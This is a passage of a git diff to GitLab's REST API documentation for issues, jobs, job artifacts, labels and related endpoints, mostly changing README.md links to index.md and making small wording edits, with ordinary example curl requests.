before this issue | @@ -1350,7 +1352,7 @@ POST /projects/:id/issues/:issue_iid/move | Attribute | Type | Required | Description | |-----------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | | `to_project_id` | integer | yes | The ID of the new project | @@ -1496,7 +1498,7 @@ POST /projects/:id/issues/:issue_iid/subscribe | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -1641,7 +1643,7 @@ POST /projects/:id/issues/:issue_iid/unsubscribe | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -1714,7 +1716,7 @@ POST /projects/:id/issues/:issue_iid/todo | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -1838,7 +1840,7 @@ Supported attributes: | Attribute | Type | Required | Description | | :---------- | :------------- | :------- | :---------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | | `body` | String | yes | The content of a note. Must contain `/promote` at the start of a new line. | @@ -1889,7 +1891,7 @@ POST /projects/:id/issues/:issue_iid/time_estimate | Attribute | Type | Required | Description | |-------------|---------|----------|------------------------------------------| | `duration` | string | yes | The duration in human format. e.g: 3h30m | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -1917,7 +1919,7 @@ POST /projects/:id/issues/:issue_iid/reset_time_estimate | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -1946,7 +1948,7 @@ POST /projects/:id/issues/:issue_iid/add_spent_time | Attribute | Type | Required | Description | |-------------|---------|----------|------------------------------------------| | `duration` | string | yes | The duration in human format. e.g: 3h30m | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -1974,7 +1976,7 @@ POST /projects/:id/issues/:issue_iid/reset_spent_time | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -2003,7 +2005,7 @@ GET /projects/:id/issues/:issue_iid/time_stats | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -2034,7 +2036,7 @@ GET /projects/:id/issues/:issue_iid/related_merge_requests | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -2194,7 +2196,7 @@ GET /projects/:id/issues/:issue_iid/closed_by | Attribute | Type | Required | Description | | ----------- | ---------------| -------- | ---------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project issue | ```shell @@ -2271,7 +2273,7 @@ GET /projects/:id/issues/:issue_iid/participants | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -2315,7 +2317,7 @@ GET /projects/:id/issues/:issue_iid/user_agent_detail | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -2347,7 +2349,7 @@ POST /projects/:id/issues/:issue_iid/metric_images | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | | `file` | file | yes | The image file to be uploaded | | `url` | string | no | The URL to view more metric information | @@ -2379,7 +2381,7 @@ GET /projects/:id/issues/:issue_iid/metric_images | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | ```shell @@ -2417,7 +2419,7 @@ DELETE /projects/:id/issues/:issue_iid/metric_images/:image_id | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `issue_iid` | integer | yes | The internal ID of a project's issue | | `image_id` | integer | yes | The ID of the image | diff --git a/doc/api/issues_statistics.md b/doc/api/issues_statistics.md index de5f26141f5..a760424f6a2 100644 --- a/doc/api/issues_statistics.md +++ b/doc/api/issues_statistics.md @@ -4,9 +4,9 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Issues Statistics API +# Issues statistics API **(FREE)** -Every API call to issues_statistics must be authenticated. +Every API call to the [issues](../user/project/issues/index.md) statistics API must be authenticated. If a user is not a member of a project and the project is private, a `GET` request on that project results in a `404` status code. @@ -90,7 +90,7 @@ GET /groups/:id/issues_statistics?confidential=true | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ----------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `labels` | string | no | Comma-separated list of label names, issues must have all labels to be returned. `None` lists all issues with no labels. `Any` lists all issues with at least one label. | | `iids[]` | integer array | no | Return only the issues having the given `iid` | | `milestone` | string | no | The milestone title. `None` lists all issues with no milestone. `Any` lists all issues that have an assigned milestone. | @@ -146,7 +146,7 @@ GET /projects/:id/issues_statistics?confidential=true | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ----------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `iids[]` | integer array | no | Return only the milestone having the given `iid` | | `labels` | string | no | Comma-separated list of label names, issues must have all labels to be returned. `None` lists all issues with no labels. `Any` lists all issues with at least one label. | | `milestone` | string | no | The milestone title. `None` lists all issues with no milestone. `Any` lists all issues that have an assigned milestone. | diff --git a/doc/api/iterations.md b/doc/api/iterations.md index be52ef0ea47..c39c397f27e 100644 --- a/doc/api/iterations.md +++ b/doc/api/iterations.md @@ -28,7 +28,7 @@ GET /projects/:id/iterations?search=version | Attribute | Type | Required | Description | | ------------------- | ------- | -------- | ----------- | -| `state` | string | no | Return only `opened`, `upcoming`, `started`, `closed`, or `all` iterations. Defaults to `all`. | +| `state` | string | no | 'Return `opened`, `upcoming`, `current (previously started)`, `closed`, or `all` iterations. Filtering by `started` state is deprecated starting with 14.1, please use `current` instead.' | | `search` | string | no | Return only iterations with a title matching the provided string. | | `include_ancestors` | boolean | no | Include iterations from parent group and its ancestors. Defaults to `true`. | diff --git a/doc/api/job_artifacts.md b/doc/api/job_artifacts.md index 54404559577..5e2312891ef 100644 --- a/doc/api/job_artifacts.md +++ b/doc/api/job_artifacts.md @@ -18,9 +18,9 @@ GET /projects/:id/jobs/:job_id/artifacts | Attribute | Type | Required | Description | |-------------|----------------|----------|--------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `job_id` | integer | yes | ID of a job. | -| `job_token` **(PREMIUM)** | string | no | To be used with [triggers](../ci/triggers/README.md#when-a-pipeline-depends-on-the-artifacts-of-another-pipeline) for multi-project pipelines. It should be invoked only inside `.gitlab-ci.yml`. Its value is always `$CI_JOB_TOKEN`. | +| `job_token` **(PREMIUM)** | string | no | To be used with [triggers](../ci/triggers/index.md#when-a-pipeline-depends-on-the-artifacts-of-another-pipeline) for multi-project pipelines. It should be invoked only inside `.gitlab-ci.yml`. Its value is always `$CI_JOB_TOKEN`. | Example request using the `PRIVATE-TOKEN` header: @@ -28,7 +28,7 @@ Example request using the `PRIVATE-TOKEN` header: curl --output artifacts.zip --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/1/jobs/42/artifacts" ``` -To use this in a [`script` definition](../ci/yaml/README.md#script) inside +To use this in a [`script` definition](../ci/yaml/index.md#script) inside `.gitlab-ci.yml` **(PREMIUM)**, you can use either: - The `JOB-TOKEN` header with the GitLab-provided `CI_JOB_TOKEN` variable. @@ -70,7 +70,7 @@ is the same as [getting the job's artifacts](#get-job-artifacts), but by defining the job's name instead of its ID. NOTE: -If a pipeline is [parent of other child pipelines](../ci/parent_child_pipelines.md), artifacts +If a pipeline is [parent of other child pipelines](../ci/pipelines/parent_child_pipelines.md), artifacts are searched in hierarchical order from parent to child. For example, if both parent and child pipelines have a job with the same name, the artifact from the parent pipeline is returned. @@ -82,10 +82,10 @@ Parameters | Attribute | Type | Required | Description | |-------------|----------------|----------|--------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `ref_name` | string | yes | Branch or tag name in repository. HEAD or SHA references are not supported. | | `job` | string | yes | The name of the job. | -| `job_token` **(PREMIUM)** | string | no | To be used with [triggers](../ci/triggers/README.md#when-a-pipeline-depends-on-the-artifacts-of-another-pipeline) for multi-project pipelines. It should be invoked only inside `.gitlab-ci.yml`. Its value is always `$CI_JOB_TOKEN`. | +| `job_token` **(PREMIUM)** | string | no | To be used with [triggers](../ci/triggers/index.md#when-a-pipeline-depends-on-the-artifacts-of-another-pipeline) for multi-project pipelines. It should be invoked only inside `.gitlab-ci.yml`. Its value is always `$CI_JOB_TOKEN`. | Example request using the `PRIVATE-TOKEN` header: @@ -93,7 +93,7 @@ Example request using the `PRIVATE-TOKEN` header: curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/1/jobs/artifacts/main/download?job=test" ``` -To use this in a [`script` definition](../ci/yaml/README.md#script) inside +To use this in a [`script` definition](../ci/yaml/index.md#script) inside `.gitlab-ci.yml` **(PREMIUM)**, you can use either: - The `JOB-TOKEN` header with the GitLab-provided `CI_JOB_TOKEN` variable. @@ -143,10 +143,10 @@ Parameters | Attribute | Type | Required | Description | |-----------------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `job_id` | integer | yes | The unique job identifier. | | `artifact_path` | string | yes | Path to a file inside the artifacts archive. | -| `job_token` **(PREMIUM)** | string | no | To be used with [triggers](../ci/triggers/README.md#when-a-pipeline-depends-on-the-artifacts-of-another-pipeline) for multi-project pipelines. It should be invoked only inside `.gitlab-ci.yml`. Its value is always `$CI_JOB_TOKEN`. | +| `job_token` **(PREMIUM)** | string | no | To be used with [triggers](../ci/triggers/index.md#when-a-pipeline-depends-on-the-artifacts-of-another-pipeline) for multi-project pipelines. It should be invoked only inside `.gitlab-ci.yml`. Its value is always `$CI_JOB_TOKEN`. | Example request: @@ -172,7 +172,7 @@ pipeline for the given reference name from inside the job's artifacts archive. The file is extracted from the archive and streamed to the client. In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/201784) and later, artifacts -for [parent and child pipelines](../ci/parent_child_pipelines.md) are searched in hierarchical +for [parent and child pipelines](../ci/pipelines/parent_child_pipelines.md) are searched in hierarchical order from parent to child. For example, if both parent and child pipelines have a job with the same name, the artifact from the parent pipeline is returned. @@ -184,11 +184,11 @@ Parameters: | Attribute | Type | Required | Description | |-----------------|----------------|----------|--------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `ref_name` | string | yes | Branch or tag name in repository. `HEAD` or `SHA` references are not supported. | | `artifact_path` | string | yes | Path to a file inside the artifacts archive. | | `job` | string | yes | The name of the job. | -| `job_token` **(PREMIUM)** | string | no | To be used with [triggers](../ci/triggers/README.md#when-a-pipeline-depends-on-the-artifacts-of-another-pipeline) for multi-project pipelines. It should be invoked only inside `.gitlab-ci.yml`. Its value is always `$CI_JOB_TOKEN`. | +| `job_token` **(PREMIUM)** | string | no | To be used with [triggers](../ci/triggers/index.md#when-a-pipeline-depends-on-the-artifacts-of-another-pipeline) for multi-project pipelines. It should be invoked only inside `.gitlab-ci.yml`. Its value is always `$CI_JOB_TOKEN`. | Example request: @@ -216,7 +216,7 @@ Parameters | Attribute | Type | Required | Description | |-----------|----------------|----------|--------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `job_id` | integer | yes | ID of a job. | Example request: @@ -270,7 +270,7 @@ DELETE /projects/:id/jobs/:job_id/artifacts | Attribute | Type | Required | Description | |-----------|----------------|----------|-----------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `job_id` | integer | yes | ID of a job. | Example request: diff --git a/doc/api/jobs.md b/doc/api/jobs.md index b92f2a72c03..42774b80b27 100644 --- a/doc/api/jobs.md +++ b/doc/api/jobs.md @@ -16,7 +16,7 @@ GET /projects/:id/jobs | Attribute | Type | Required | Description | |-----------|--------------------------------|----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `scope` | string **or** array of strings | no | Scope of jobs to show. Either one of or an array of the following: `created`, `pending`, `running`, `failed`, `success`, `canceled`, `skipped`, or `manual`. All jobs are returned if `scope` is not provided. | ```shell @@ -159,7 +159,7 @@ GET /projects/:id/pipelines/:pipeline_id/jobs | Attribute | Type | Required | Description | |-------------------|--------------------------------|----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `pipeline_id` | integer | yes | ID of a pipeline. Can also be obtained in CI jobs via the [predefined CI variable](../ci/variables/predefined_variables.md) `CI_PIPELINE_ID`. | | `scope` | string **or** array of strings | no | Scope of jobs to show. Either one of or an array of the following: `created`, `pending`, `running`, `failed`, `success`, `canceled`, `skipped`, or `manual`. All jobs are returned if `scope` is not provided. | | `include_retried` | boolean | no | Include retried jobs in the response. Defaults to `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/272627) in GitLab 13.9. | @@ -295,7 +295,7 @@ Example of response ``` In GitLab 13.3 and later, this endpoint [returns data for any pipeline](pipelines.md#single-pipeline-requests) -including [child pipelines](../ci/parent_child_pipelines.md). +including [child pipelines](../ci/pipelines/parent_child_pipelines.md). In GitLab 13.5 and later, this endpoint does not return retried jobs in the response by default. Additionally, jobs are sorted by ID in descending order (newest first). @@ -314,7 +314,7 @@ GET /projects/:id/pipelines/:pipeline_id/bridges | Attribute | Type | Required | Description | |---------------|--------------------------------|----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `pipeline_id` | integer | yes | ID of a pipeline. | | `scope` | string **or** array of strings | no | Scope of jobs to show. Either one of or an array of the following: `created`, `pending`, `running`, `failed`, `success`, `canceled`, `skipped`, or `manual`. All jobs are returned if `scope` is not provided. | @@ -554,7 +554,7 @@ GET /projects/:id/jobs/:job_id | Attribute | Type | Required | Description | |-----------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `job_id` | integer | yes | ID of a job. | ```shell @@ -631,7 +631,7 @@ GET /projects/:id/jobs/:job_id/trace | Attribute | Type | Required | Description | |-----------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `job_id` | integer | yes | ID of a job. | ```shell @@ -655,7 +655,7 @@ POST /projects/:id/jobs/:job_id/cancel | Attribute | Type | Required | Description | |-----------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `job_id` | integer | yes | ID of a job. | ```shell @@ -705,7 +705,7 @@ POST /projects/:id/jobs/:job_id/retry | Attribute | Type | Required | Description | |-----------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `job_id` | integer | yes | ID of a job. | ```shell @@ -757,7 +757,7 @@ Parameters | Attribute | Type | Required | Description | |-----------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `job_id` | integer | yes | ID of a job. | Example of request @@ -810,7 +810,7 @@ POST /projects/:id/jobs/:job_id/play | Attribute | Type | Required | Description | |-----------|----------------|----------|------------------------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `job_id` | integer | yes | ID of a job. | ```shell diff --git a/doc/api/labels.md b/doc/api/labels.md index 5abab7a79c4..1606df03afb 100644 --- a/doc/api/labels.md +++ b/doc/api/labels.md @@ -4,7 +4,9 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Labels API +# Labels API **(FREE)** + +Interact with [labels](../user/project/labels.md) using the REST API. NOTE: The `description_html` - was added to response JSON in [GitLab 12.7](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/21413). @@ -13,7 +15,7 @@ The `description_html` - was added to response JSON in [GitLab 12.7](https://git Get all labels for a given project. -By default, this request returns 20 results at a time because the API results [are paginated](README.md#pagination). +By default, this request returns 20 results at a time because the API results [are paginated](index.md#pagination). ```plaintext GET /projects/:id/labels @@ -21,7 +23,7 @@ GET /projects/:id/labels | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `with_counts` | boolean | no | Whether or not to include issue and merge request counts. Defaults to `false`. _([Introduced in GitLab 12.2](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/31543))_ | | `include_ancestor_groups` | boolean | no | Include ancestor groups. Defaults to `true`. | | `search` | string | no | Keyword to filter labels by. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/259024) in GitLab 13.6 | @@ -117,7 +119,7 @@ GET /projects/:id/labels/:label_id | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a project's label. | | `include_ancestor_groups` | boolean | no | Include ancestor groups. Defaults to `true`. | @@ -154,9 +156,9 @@ POST /projects/:id/labels | Attribute | Type | Required | Description | | ------------- | ------- | -------- | ---------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the label | -| `color` | string | yes | The color of the label given in 6-digit hex notation with leading '#' sign (e.g. #FFAABB) or one of the [CSS color names](https://developer.mozilla.org/en-US/docs/Web/CSS/color_value#Color_keywords) | +| `color` | string | yes | The color of the label given in 6-digit hex notation with leading '#' sign (for example, #FFAABB) or one of the [CSS color names](https://developer.mozilla.org/en-US/docs/Web/CSS/color_value#Color_keywords) | | `description` | string | no | The description of the label | | `priority` | integer | no | The priority of the label. Must be greater or equal than zero or `null` to remove the priority. | @@ -193,7 +195,7 @@ DELETE /projects/:id/labels/:label_id | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a group's label. | ```shell @@ -214,10 +216,10 @@ PUT /projects/:id/labels/:label_id | Attribute | Type | Required | Description | | --------------- | ------- | --------------------------------- | ------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a group's label. | | `new_name` | string | yes if `color` is not provided | The new name of the label | -| `color` | string | yes if `new_name` is not provided | The color of the label given in 6-digit hex notation with leading '#' sign (e.g. #FFAABB) or one of the [CSS color names](https://developer.mozilla.org/en-US/docs/Web/CSS/color_value#Color_keywords) | +| `color` | string | yes if `new_name` is not provided | The color of the label given in 6-digit hex notation with leading '#' sign (for example, #FFAABB) or one of the [CSS color names](https://developer.mozilla.org/en-US/docs/Web/CSS/color_value#Color_keywords) | | `description` | string | no | The new description of the label | | `priority` | integer | no | The new priority of the label. Must be greater or equal than zero or `null` to remove the priority. | @@ -263,7 +265,7 @@ PUT /projects/:id/labels/:label_id/promote | Attribute | Type | Required | Description | | --------------- | ------- | --------------------------------- | ------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a group's label. | ```shell @@ -301,7 +303,7 @@ POST /projects/:id/labels/:label_id/subscribe | Attribute | Type | Required | Description | | ---------- | ----------------- | -------- | ------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a project's label | ```shell @@ -339,7 +341,7 @@ POST /projects/:id/labels/:label_id/unsubscribe | Attribute | Type | Required | Description | | ---------- | ----------------- | -------- | ------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a project's label | ```shell diff --git a/doc/api/lint.md b/doc/api/lint.md index 57d11d15adc..a47bb028248 100644 --- a/doc/api/lint.md +++ b/doc/api/lint.md @@ -87,8 +87,8 @@ Example responses: > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29568) in GitLab 13.5. The CI lint returns an expanded version of the configuration. The expansion does not -work for CI configuration added with [`include: local`](../ci/yaml/README.md#includelocal), -or with [`extends:`](../ci/yaml/README.md#extends). +work for CI configuration added with [`include: local`](../ci/yaml/index.md#includelocal), +or with [`extends:`](../ci/yaml/index.md#extends). Example contents of a `.gitlab-ci.yml` passed to the CI Lint API with `include_merged_yaml` set as true: diff --git a/doc/api/managed_licenses.md b/doc/api/managed_licenses.md index 4be4f83b4ce..3967fe52a03 100644 --- a/doc/api/managed_licenses.md +++ b/doc/api/managed_licenses.md @@ -16,7 +16,7 @@ GET /projects/:id/managed_licenses | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/1/managed_licenses" @@ -49,7 +49,7 @@ GET /projects/:id/managed_licenses/:managed_license_id | Attribute | Type | Required | Description | | --------------- | ------- | --------------------------------- | ------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `managed_license_id` | integer/string | yes | The ID or URL-encoded name of the license belonging to the project | ```shell @@ -76,7 +76,7 @@ POST /projects/:id/managed_licenses | Attribute | Type | Required | Description | | ------------- | ------- | -------- | ---------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the 